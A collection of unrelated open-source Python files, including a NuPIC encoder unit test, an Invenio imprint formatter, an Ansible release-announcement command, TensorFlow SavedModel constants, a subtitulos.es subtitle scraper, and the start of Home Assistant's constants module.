raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
|
apache-2.0
|
chen0031/nupic
|
tests/unit/nupic/encoders/pass_through_encoder_test.py
|
28
|
5099
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for PassThru Encoder."""
CL_VERBOSITY = 0
import tempfile
import unittest2 as unittest
import numpy
from nupic.encoders.pass_through_encoder import PassThroughEncoder
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.encoders.pass_through_capnp import PassThroughEncoderProto
class PassThroughEncoderTest(unittest.TestCase):
"""Unit tests for PassThroughEncoder class."""
def setUp(self):
self.n = 9
self.name = "foo"
self._encoder = PassThroughEncoder
def testEncodeArray(self):
"""Send bitmap as array"""
e = self._encoder(self.n, name=self.name)
bitmap = [0,0,0,1,0,0,0,0,0]
out = e.encode(bitmap)
self.assertEqual(out.sum(), sum(bitmap))
x = e.decode(out)
self.assertIsInstance(x[0], dict)
self.assertTrue(self.name in x[0])
def testEncodeBitArray(self):
"""Send bitmap as numpy bit array"""
e = self._encoder(self.n, name=self.name)
bitmap = numpy.zeros(self.n, dtype=numpy.uint8)
bitmap[3] = 1
bitmap[5] = 1
out = e.encode(bitmap)
expectedSum = sum(bitmap)
realSum = out.sum()
self.assertEqual(realSum, expectedSum)
def testClosenessScores(self):
"""Compare two bitmaps for closeness"""
e = self._encoder(self.n, name=self.name)
"""Identical => 1"""
bitmap1 = [0,0,0,1,1,1,0,0,0]
bitmap2 = [0,0,0,1,1,1,0,0,0]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 1.0)
"""No overlap => 0"""
bitmap1 = [0,0,0,1,1,1,0,0,0]
bitmap2 = [1,1,1,0,0,0,1,1,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.0)
"""Similar => 4 of 5 match"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,0,1,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
"""Little => 1 of 5 match"""
bitmap1 = [1,0,0,1,1,0,1,0,1]
bitmap2 = [0,1,1,1,0,1,0,1,0]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.2)
"""Extra active bit => off by 1 of 5"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,1,1,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
"""Missing active bit => off by 1 of 5"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,0,0,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testReadWrite(self):
original = self._encoder(self.n, name=self.name)
originalValue = original.encode([1,0,1,0,1,0,1,0,1])
proto1 = PassThroughEncoderProto.new_message()
original.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = PassThroughEncoderProto.read(f)
encoder = PassThroughEncoder.read(proto2)
self.assertIsInstance(encoder, PassThroughEncoder)
self.assertEqual(encoder.name, original.name)
self.assertEqual(encoder.verbosity, original.verbosity)
self.assertEqual(encoder.w, original.w)
self.assertEqual(encoder.n, original.n)
self.assertEqual(encoder.description, original.description)
self.assertTrue(numpy.array_equal(encoder.encode([1,0,1,0,1,0,1,0,1]),
originalValue))
self.assertEqual(original.decode(encoder.encode([1,0,1,0,1,0,1,0,1])),
encoder.decode(original.encode([1,0,1,0,1,0,1,0,1])))
# Feed in a new value and ensure the encodings match
result1 = original.encode([0,1,0,1,0,1,0,1,0])
result2 = encoder.encode([0,1,0,1,0,1,0,1,0])
self.assertTrue(numpy.array_equal(result1, result2))
if __name__ == "__main__":
unittest.main()
|
agpl-3.0
|
egabancho/invenio
|
invenio/modules/formatter/format_elements/bfe_imprint.py
|
36
|
2474
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Prints document imprint
"""
__revision__ = "$Id$"
import time
def format_element(bfo, place_label, publisher_label, date_label,
separator=', ', date_format=""):
"""
Print imprint (Order: Name of publisher, place of publication and date of publication).
Parameter <code>date_format</code> allows to specify the string representation of the output.
The format string has the same behaviour as the strftime() function::
<pre>Eg: 1982-09-24 07:32:00
"%d %B %Y" -> 24 September 1982
"%I:%M" -> 07:32
</pre>
@param separator: a separator between the elements of imprint
@param place_label: a label to print before the publication place value
@param publisher_label: a label to print before the publisher name
    @param date_label: a label to print before the publication date
@param date_format: date format
@see: place.py, publisher.py, date.py, reprints.py, pagination.py
"""
place = bfo.field('260__a')
publisher = bfo.field('260__b')
date = bfo.field('260__c')
out = ""
if publisher != "sine nomine":
out += publisher_label + ' ' + publisher + separator
if place != "sine loco":
out += place_label + ' ' + place + separator
if len(date) > 0:
if date_format != '':
try:
date_time = time.strptime(date, "%Y-%m-%d")
out += date_label + " " + time.strftime(date_format, date_time)
except ValueError:
out += date_label + ' ' + date
else:
out += date_label + ' ' + date
return out
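# Illustrative sketch (not part of the original element): for a hypothetical
# record with 260__a = "Geneva", 260__b = "CERN" and 260__c = "2001-05-01",
#
#     format_element(bfo, "Place:", "Publisher:", "Date:", date_format="%d %B %Y")
#
# would return "Publisher: CERN, Place: Geneva, Date: 01 May 2001": the publisher
# is printed first, then the place, then the date reformatted with strftime().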
|
gpl-2.0
|
s-hertel/ansible
|
hacking/build_library/build_ansible/command_plugins/release_announcement.py
|
55
|
2905
|
# coding: utf-8
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
from collections import UserString
from distutils.version import LooseVersion
# Pylint doesn't understand Python3 namespace modules.
from ..commands import Command # pylint: disable=relative-beyond-top-level
from .. import errors # pylint: disable=relative-beyond-top-level
class VersionStr(UserString):
def __init__(self, string):
super().__init__(string.strip())
self.ver_obj = LooseVersion(string)
def transform_args(args):
# Make it possible to sort versions in the jinja2 templates
new_versions = []
for version in args.versions:
new_versions.append(VersionStr(version))
args.versions = new_versions
return args
def write_message(filename, message):
if filename != '-':
with open(filename, 'w') as out_file:
out_file.write(message)
else:
sys.stdout.write('\n\n')
sys.stdout.write(message)
class ReleaseAnnouncementCommand(Command):
name = 'release-announcement'
@classmethod
def init_parser(cls, add_parser):
parser = add_parser(cls.name,
description="Generate email and twitter announcements from template")
parser.add_argument("--version", dest="versions", type=str, required=True, action='append',
help="Versions of Ansible to announce")
parser.add_argument("--name", type=str, required=True, help="Real name to use on emails")
parser.add_argument("--email-out", type=str, default="-",
help="Filename to place the email announcement into")
parser.add_argument("--twitter-out", type=str, default="-",
help="Filename to place the twitter announcement into")
@classmethod
def main(cls, args):
if sys.version_info < (3, 6):
raise errors.DependencyError('The {0} subcommand needs Python-3.6+'
' to run'.format(cls.name))
# Import here because these functions are invalid on Python-3.5 and the command plugins and
# init_parser() method need to be compatible with Python-3.4+ for now.
# Pylint doesn't understand Python3 namespace modules.
from .. announce import create_short_message, create_long_message # pylint: disable=relative-beyond-top-level
args = transform_args(args)
twitter_message = create_short_message(args.versions)
email_message = create_long_message(args.versions, args.name)
write_message(args.twitter_out, twitter_message)
write_message(args.email_out, email_message)
return 0
|
gpl-3.0
|
asimshankar/tensorflow
|
tensorflow/python/saved_model/constants.py
|
13
|
4118
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Constants for SavedModel save and restore operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.tf_export import tf_export
# Subdirectory name containing the asset files.
ASSETS_DIRECTORY = "assets"
tf_export(
"saved_model.ASSETS_DIRECTORY",
v1=[
"saved_model.ASSETS_DIRECTORY", "saved_model.constants.ASSETS_DIRECTORY"
]).export_constant(__name__, "ASSETS_DIRECTORY")
# Subdirectory name containing unmanaged files from higher-level APIs.
EXTRA_ASSETS_DIRECTORY = "assets.extra"
# CollectionDef key containing SavedModel assets.
ASSETS_KEY = "saved_model_assets"
tf_export(
"saved_model.ASSETS_KEY",
v1=["saved_model.ASSETS_KEY",
"saved_model.constants.ASSETS_KEY"]).export_constant(
__name__, "ASSETS_KEY")
# CollectionDef key for the legacy init op.
LEGACY_INIT_OP_KEY = "legacy_init_op"
tf_export(
v1=[
"saved_model.LEGACY_INIT_OP_KEY",
"saved_model.constants.LEGACY_INIT_OP_KEY"
]).export_constant(__name__, "LEGACY_INIT_OP_KEY")
# CollectionDef key for the SavedModel main op.
MAIN_OP_KEY = "saved_model_main_op"
tf_export(
v1=["saved_model.MAIN_OP_KEY",
"saved_model.constants.MAIN_OP_KEY"]).export_constant(
__name__, "MAIN_OP_KEY")
# CollectionDef key for the SavedModel train op.
# Not exported while export_all_saved_models is experimental.
TRAIN_OP_KEY = "saved_model_train_op"
# Schema version for SavedModel.
SAVED_MODEL_SCHEMA_VERSION = 1
tf_export(
"saved_model.SAVED_MODEL_SCHEMA_VERSION",
v1=[
"saved_model.SAVED_MODEL_SCHEMA_VERSION",
"saved_model.constants.SAVED_MODEL_SCHEMA_VERSION"
]).export_constant(__name__, "SAVED_MODEL_SCHEMA_VERSION")
# File name for SavedModel protocol buffer.
SAVED_MODEL_FILENAME_PB = "saved_model.pb"
tf_export(
"saved_model.SAVED_MODEL_FILENAME_PB",
v1=[
"saved_model.SAVED_MODEL_FILENAME_PB",
"saved_model.constants.SAVED_MODEL_FILENAME_PB"
]).export_constant(__name__, "SAVED_MODEL_FILENAME_PB")
# File name for text version of SavedModel protocol buffer.
SAVED_MODEL_FILENAME_PBTXT = "saved_model.pbtxt"
tf_export(
"saved_model.SAVED_MODEL_FILENAME_PBTXT",
v1=[
"saved_model.SAVED_MODEL_FILENAME_PBTXT",
"saved_model.constants.SAVED_MODEL_FILENAME_PBTXT"
]).export_constant(__name__, "SAVED_MODEL_FILENAME_PBTXT")
# File name for json format of SavedModel.
# Not exported while keras_saved_model is in contrib.
SAVED_MODEL_FILENAME_JSON = "saved_model.json"
# Subdirectory name containing the variables/checkpoint files.
VARIABLES_DIRECTORY = "variables"
tf_export(
"saved_model.VARIABLES_DIRECTORY",
v1=[
"saved_model.VARIABLES_DIRECTORY",
"saved_model.constants.VARIABLES_DIRECTORY"
]).export_constant(__name__, "VARIABLES_DIRECTORY")
# File name used for variables.
VARIABLES_FILENAME = "variables"
tf_export(
"saved_model.VARIABLES_FILENAME",
v1=[
"saved_model.VARIABLES_FILENAME",
"saved_model.constants.VARIABLES_FILENAME"
]).export_constant(__name__, "VARIABLES_FILENAME")
# The initialization and train ops for a MetaGraph are stored in the
# signature def map. The ops are added to the map with the following keys.
INIT_OP_SIGNATURE_KEY = "__saved_model_init_op"
TRAIN_OP_SIGNATURE_KEY = "__saved_model_train_op"
|
apache-2.0
|
josemartin/TVshowDownloader
|
subService.py
|
1
|
13451
|
# -*- coding: utf-8 -*-
# based on argenteam.net subtitles, based on a mod of Subdivx.com subtitles, based on a mod of Undertext subtitles
# developed by quillo86 and infinito for Subtitulos.es and XBMC.org
# little fixes and updates by tux_os
#
# Adaptation for tv show downloader by J. Martin
#
import os, sys, re, string, time, urllib, urllib2
main_url = "http://www.subtitulos.es/"
debug_pretext = "subtitulos.es"
#====================================================================================================================
# Regular expression patterns
#====================================================================================================================
subtitle_pattern1 = "<div id=\"version\" class=\"ssdiv\">(.+?)Versión(.+?)<span class=\"right traduccion\">(.+?)</div>(.+?)</div>"
subtitle_pattern2 = "<li class='li-idioma'>(.+?)<strong>(.+?)</strong>(.+?)<li class='li-estado (.+?)</li>(.+?)<span class='descargar (.+?)</span>"
#====================================================================================================================
# Functions
#====================================================================================================================
def getallsubs(languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode):
if re.search(r'\([^)]*\)', tvshow):
for level in range(4):
searchstring, tvshow, season, episode = getsearchstring(tvshow, season, episode, level)
url = main_url + searchstring.lower()
getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode)
else:
searchstring, tvshow, season, episode = getsearchstring(tvshow, season, episode, 0)
url = main_url + searchstring.lower()
getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode)
def getallsubsforurl(url, languageshort, langlong, file_original_path, subtitles_list, tvshow, season, episode):
content = geturl(url)
for matches in re.finditer(subtitle_pattern1, content, re.IGNORECASE | re.DOTALL | re.MULTILINE | re.UNICODE):
filename = urllib.unquote_plus(matches.group(2))
filename = string.join(filename.split()[:-2])
filename = re.sub(r' ', '.', filename)
filename = re.sub(r'\s', '.', tvshow) + "." + season + "x" + episode + "." + filename
server = filename
backup = filename
subs = matches.group(4)
for matches in re.finditer(subtitle_pattern2, subs, re.IGNORECASE | re.DOTALL | re.MULTILINE | re.UNICODE):
#log( __name__ ,"Descargas: %s" % (matches.group(2)))
idioma = matches.group(2)
idioma = re.sub(r'\xc3\xb1', 'n', idioma)
idioma = re.sub(r'\xc3\xa0', 'a', idioma)
idioma = re.sub(r'\xc3\xa9', 'e', idioma)
if idioma == "English":
languageshort = "en"
languagelong = "English"
filename = filename + ".(ENGLISH)"
server = filename
elif idioma == "Catala":
languageshort = "ca"
languagelong = "Catalan"
filename = filename + ".(CATALA)"
server = filename
elif idioma == "Espanol (Latinoamerica)":
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(LATINO)"
server = filename
elif idioma == "Galego":
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(GALEGO)"
server = filename
else:
languageshort = "es"
languagelong = "Spanish"
filename = filename + ".(ESPAÑA)"
server = filename
estado = matches.group(4)
estado = re.sub(r'\t', '', estado)
estado = re.sub(r'\n', '', estado)
id = matches.group(6)
id = re.sub(r'([^-]*)href="', '', id)
id = re.sub(r'" rel([^-]*)', '', id)
id = re.sub(r'" re([^-]*)', '', id)
id = re.sub(r'http://www.subtitulos.es/', '', id)
if estado.strip() == "green'>Completado".strip() and languagelong == langlong:
subtitles_list.append({'rating': "0", 'no_files': 1, 'filename': filename, 'server': server, 'sync': False, 'id' : id, 'language_flag': 'flags/' + languageshort + '.gif', 'language_name': languagelong})
filename = backup
server = backup
def geturl(url):
class AppURLopener(urllib.FancyURLopener):
version = "App/1.7"
def __init__(self, *args):
urllib.FancyURLopener.__init__(self, *args)
def add_referrer(self, url=None):
if url:
urllib._urlopener.addheader('Referer', url)
urllib._urlopener = AppURLopener()
urllib._urlopener.add_referrer("http://www.subtitulos.es/")
try:
response = urllib._urlopener.open(url)
content = response.read()
except:
#log( __name__ ,"%s Failed to get url:%s" % (debug_pretext, url))
content = None
return content
def getsearchstring(tvshow, season, episode, level):
# Clean tv show name
if level == 1 and re.search(r'\([^)][a-zA-Z]*\)', tvshow):
# Series name like "Shameless (US)" -> "Shameless US"
tvshow = tvshow.replace('(', '').replace(')', '')
if level == 2 and re.search(r'\([^)][0-9]*\)', tvshow):
# Series name like "Scandal (2012)" -> "Scandal"
tvshow = re.sub(r'\s\([^)]*\)', '', tvshow)
if level == 3 and re.search(r'\([^)]*\)', tvshow):
# Series name like "Shameless (*)" -> "Shameless"
tvshow = re.sub(r'\s\([^)]*\)', '', tvshow)
# Zero pad episode
episode = str(episode).rjust(2, '0')
# Build search string
searchstring = tvshow + '/' + season + 'x' + episode
# Replace spaces with dashes
searchstring = re.sub(r'\s', '-', searchstring)
#log( __name__ ,"%s Search string = %s" % (debug_pretext, searchstring))
return searchstring, tvshow, season, episode
def clean_subtitles_list(subtitles_list):
seen = set()
subs = []
for sub in subtitles_list:
filename = sub['filename']
#log(__name__, "Filename: %s" % filename)
if filename not in seen:
subs.append(sub)
seen.add(filename)
return subs
def search_subtitles( file_original_path, title, tvshow, year, season, episode, set_temp, rar, lang1, lang2, lang3, stack ): #standard input
subtitles_list = []
msg = ""
if len(tvshow) == 0:
msg = "Subtitulos.es is only for TV Shows subtitles!"
if lang1 == "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang1 == "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang1 == "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if lang2 == "Spanish" and lang1 != "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang2 == "English" and lang1 != "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang2 == "Catalan" and lang1 != "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if lang3 == "Spanish" and lang1 != "Spanish" and lang2 != "Spanish":
languagelong = "Spanish"
languageshort = "es"
getallsubs("es", "Spanish", file_original_path, subtitles_list, tvshow, season, episode)
elif lang3 == "English" and lang1 != "English" and lang2 != "English":
languagelong = "English"
languageshort = "en"
getallsubs("en", "English", file_original_path, subtitles_list, tvshow, season, episode)
elif lang3 == "Catalan" and lang1 != "Catalan" and lang2 != "Catalan":
languagelong = "Catalan"
languageshort = "ca"
getallsubs("ca", "Catalan", file_original_path, subtitles_list, tvshow, season, episode)
if ((lang1 != "Spanish") and (lang2 != "English") and (lang3 != "Catalan")):
msg = "Won't work, subtitulos.es is only for Spanish, English and Catalan subtitles!"
subtitles_list = clean_subtitles_list(subtitles_list)
return subtitles_list, "", msg #standard output
def download_subtitles (subtitles_list, pos, zip_subs, tmp_sub_dir, sub_folder, session_id): #standard input
id = subtitles_list[pos][ "id" ]
server = subtitles_list[pos][ "server" ]
language = subtitles_list[pos][ "language_name" ]
srtfile = subtitles_list[pos][ "filename" ] + ".srt"
url = "http://www.subtitulos.es/" + id
content = geturl(url)
if content is not None:
header = content[:4]
local_tmp_file = os.path.join(tmp_sub_dir, srtfile) # assume unpacked sub file is an '.srt'
subs_file = local_tmp_file
packed = False
#print "%s Saving subtitles to '%s'" % (debug_pretext, local_tmp_file)
try:
#log( __name__ ,"%s argenteam: escribo en %s" % (debug_pretext, local_tmp_file)) #EGO
local_file_handle = open(local_tmp_file, "wb")
local_file_handle.write(content)
local_file_handle.close()
except:
pass
#log( __name__ ,"%s Failed to save subtitles to '%s'" % (debug_pretext, local_tmp_file))
if packed:
files = os.listdir(tmp_sub_dir)
init_filecount = len(files)
#log( __name__ ,"%s argenteam: número de init_filecount %s" % (debug_pretext, init_filecount)) #EGO
filecount = init_filecount
max_mtime = 0
# determine the newest file from tmp_sub_dir
for file in files:
if (string.split(file,'.')[-1] in ['srt','sub','txt']):
mtime = os.stat(os.path.join(tmp_sub_dir, file)).st_mtime
if mtime > max_mtime:
max_mtime = mtime
init_max_mtime = max_mtime
time.sleep(2) # wait 2 seconds so that the unpacked files are at least 1 second newer
xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + tmp_sub_dir +")")
waittime = 0
while (filecount == init_filecount) and (waittime < 20) and (init_max_mtime == max_mtime): # nothing yet extracted
time.sleep(1) # wait 1 second to let the builtin function 'XBMC.extract' unpack
files = os.listdir(tmp_sub_dir)
filecount = len(files)
# determine if there is a newer file created in tmp_sub_dir (marks that the extraction had completed)
for file in files:
if (string.split(file,'.')[-1] in ['srt','sub','txt']):
mtime = os.stat(os.path.join(tmp_sub_dir, file)).st_mtime
if (mtime > max_mtime):
max_mtime = mtime
waittime = waittime + 1
if waittime == 20:
print "%s Failed to unpack subtitles in '%s'" % (debug_pretext, tmp_sub_dir)
else:
print "%s Unpacked files in '%s'" % (debug_pretext, tmp_sub_dir)
for file in files:
# there could be more subtitle files in tmp_sub_dir, so make sure we get the newly created subtitle file
if (string.split(file, '.')[-1] in ['srt', 'sub', 'txt']) and (os.stat(os.path.join(tmp_sub_dir, file)).st_mtime > init_max_mtime): # unpacked file is a newly created subtitle file
print "%s Unpacked subtitles file '%s'" % (debug_pretext, file)
subs_file = os.path.join(tmp_sub_dir, file)
return False, language, subs_file #standard output
|
gpl-3.0
|
stsouko/MWUI
|
vk_update/VKUpdate/misaka.py
|
1
|
1044
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Ramil Nugmanov <[email protected]>
# This file is part of CIpress.
#
# CIpress is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, see <https://www.gnu.org/licenses/>.
#
from misaka import HtmlRenderer
class MisakaRenderer(HtmlRenderer):
def table(self, content):
return f'<table class="table">{content}</table>'
def paragraph(self, content):
return f'<p class="para">{content}</p>'
__all__ = ['MisakaRenderer']
|
agpl-3.0
|
MungoRae/home-assistant
|
homeassistant/const.py
|
1
|
12851
|
# coding: utf-8
"""Constants used by Home Assistant components."""
MAJOR_VERSION = 0
MINOR_VERSION = 52
PATCH_VERSION = '0.dev0'
__short_version__ = '{}.{}'.format(MAJOR_VERSION, MINOR_VERSION)
__version__ = '{}.{}'.format(__short_version__, PATCH_VERSION)
REQUIRED_PYTHON_VER = (3, 4, 2)
REQUIRED_PYTHON_VER_WIN = (3, 5, 2)
CONSTRAINT_FILE = 'package_constraints.txt'
PROJECT_NAME = 'Home Assistant'
PROJECT_PACKAGE_NAME = 'homeassistant'
PROJECT_LICENSE = 'Apache License 2.0'
PROJECT_AUTHOR = 'The Home Assistant Authors'
PROJECT_COPYRIGHT = ' 2013, {}'.format(PROJECT_AUTHOR)
PROJECT_URL = 'https://home-assistant.io/'
PROJECT_EMAIL = '[email protected]'
PROJECT_DESCRIPTION = ('Open-source home automation platform '
'running on Python 3.')
PROJECT_LONG_DESCRIPTION = ('Home Assistant is an open-source '
'home automation platform running on Python 3. '
'Track and control all devices at home and '
'automate control. '
'Installation in less than a minute.')
PROJECT_CLASSIFIERS = [
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Topic :: Home Automation'
]
PROJECT_GITHUB_USERNAME = 'home-assistant'
PROJECT_GITHUB_REPOSITORY = 'home-assistant'
PYPI_URL = 'https://pypi.python.org/pypi/{}'.format(PROJECT_PACKAGE_NAME)
GITHUB_PATH = '{}/{}'.format(PROJECT_GITHUB_USERNAME,
PROJECT_GITHUB_REPOSITORY)
GITHUB_URL = 'https://github.com/{}'.format(GITHUB_PATH)
PLATFORM_FORMAT = '{}.{}'
# Can be used to specify a catch all when registering state or event listeners.
MATCH_ALL = '*'
# If no name is specified
DEVICE_DEFAULT_NAME = 'Unnamed Device'
WEEKDAYS = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
SUN_EVENT_SUNSET = 'sunset'
SUN_EVENT_SUNRISE = 'sunrise'
# #### CONFIG ####
CONF_ABOVE = 'above'
CONF_ACCESS_TOKEN = 'access_token'
CONF_ADDRESS = 'address'
CONF_AFTER = 'after'
CONF_ALIAS = 'alias'
CONF_API_KEY = 'api_key'
CONF_AT = 'at'
CONF_AUTHENTICATION = 'authentication'
CONF_BASE = 'base'
CONF_BEFORE = 'before'
CONF_BELOW = 'below'
CONF_BINARY_SENSORS = 'binary_sensors'
CONF_BLACKLIST = 'blacklist'
CONF_BRIGHTNESS = 'brightness'
CONF_CODE = 'code'
CONF_COLOR_TEMP = 'color_temp'
CONF_COMMAND = 'command'
CONF_COMMAND_CLOSE = 'command_close'
CONF_COMMAND_OFF = 'command_off'
CONF_COMMAND_ON = 'command_on'
CONF_COMMAND_OPEN = 'command_open'
CONF_COMMAND_STATE = 'command_state'
CONF_COMMAND_STOP = 'command_stop'
CONF_CONDITION = 'condition'
CONF_COVERS = 'covers'
CONF_CURRENCY = 'currency'
CONF_CUSTOMIZE = 'customize'
CONF_CUSTOMIZE_DOMAIN = 'customize_domain'
CONF_CUSTOMIZE_GLOB = 'customize_glob'
CONF_DEVICE = 'device'
CONF_DEVICE_CLASS = 'device_class'
CONF_DEVICES = 'devices'
CONF_DISARM_AFTER_TRIGGER = 'disarm_after_trigger'
CONF_DISCOVERY = 'discovery'
CONF_DISPLAY_OPTIONS = 'display_options'
CONF_DOMAIN = 'domain'
CONF_DOMAINS = 'domains'
CONF_EFFECT = 'effect'
CONF_ELEVATION = 'elevation'
CONF_EMAIL = 'email'
CONF_ENTITIES = 'entities'
CONF_ENTITY_ID = 'entity_id'
CONF_ENTITY_NAMESPACE = 'entity_namespace'
CONF_EVENT = 'event'
CONF_EXCLUDE = 'exclude'
CONF_FILE_PATH = 'file_path'
CONF_FILENAME = 'filename'
CONF_FRIENDLY_NAME = 'friendly_name'
CONF_HEADERS = 'headers'
CONF_HOST = 'host'
CONF_HOSTS = 'hosts'
CONF_ICON = 'icon'
CONF_ICON_TEMPLATE = 'icon_template'
CONF_INCLUDE = 'include'
CONF_ID = 'id'
CONF_IP_ADDRESS = 'ip_address'
CONF_LATITUDE = 'latitude'
CONF_LONGITUDE = 'longitude'
CONF_MAC = 'mac'
CONF_METHOD = 'method'
CONF_MINIMUM = 'minimum'
CONF_MAXIMUM = 'maximum'
CONF_MONITORED_CONDITIONS = 'monitored_conditions'
CONF_MONITORED_VARIABLES = 'monitored_variables'
CONF_NAME = 'name'
CONF_OFFSET = 'offset'
CONF_OPTIMISTIC = 'optimistic'
CONF_PACKAGES = 'packages'
CONF_PASSWORD = 'password'
CONF_PATH = 'path'
CONF_PAYLOAD = 'payload'
CONF_PAYLOAD_OFF = 'payload_off'
CONF_PAYLOAD_ON = 'payload_on'
CONF_PENDING_TIME = 'pending_time'
CONF_PIN = 'pin'
CONF_PLATFORM = 'platform'
CONF_PORT = 'port'
CONF_PREFIX = 'prefix'
CONF_PROTOCOL = 'protocol'
CONF_PROXY_SSL = 'proxy_ssl'
CONF_QUOTE = 'quote'
CONF_RECIPIENT = 'recipient'
CONF_RESOURCE = 'resource'
CONF_RESOURCES = 'resources'
CONF_RGB = 'rgb'
CONF_SCAN_INTERVAL = 'scan_interval'
CONF_SENDER = 'sender'
CONF_SENSOR_TYPE = 'sensor_type'
CONF_SENSORS = 'sensors'
CONF_SLAVE = 'slave'
CONF_SSL = 'ssl'
CONF_STATE = 'state'
CONF_STRUCTURE = 'structure'
CONF_SWITCHES = 'switches'
CONF_TEMPERATURE_UNIT = 'temperature_unit'
CONF_TIME_ZONE = 'time_zone'
CONF_TIMEOUT = 'timeout'
CONF_TOKEN = 'token'
CONF_TRIGGER_TIME = 'trigger_time'
CONF_TYPE = 'type'
CONF_UNIT_OF_MEASUREMENT = 'unit_of_measurement'
CONF_UNIT_SYSTEM = 'unit_system'
CONF_URL = 'url'
CONF_USERNAME = 'username'
CONF_VALUE_TEMPLATE = 'value_template'
CONF_VERIFY_SSL = 'verify_ssl'
CONF_WEEKDAY = 'weekday'
CONF_WHITELIST = 'whitelist'
CONF_WHITELIST_EXTERNAL_DIRS = 'whitelist_external_dirs'
CONF_WHITE_VALUE = 'white_value'
CONF_XY = 'xy'
CONF_ZONE = 'zone'
# #### EVENTS ####
EVENT_HOMEASSISTANT_START = 'homeassistant_start'
EVENT_HOMEASSISTANT_STOP = 'homeassistant_stop'
EVENT_HOMEASSISTANT_CLOSE = 'homeassistant_close'
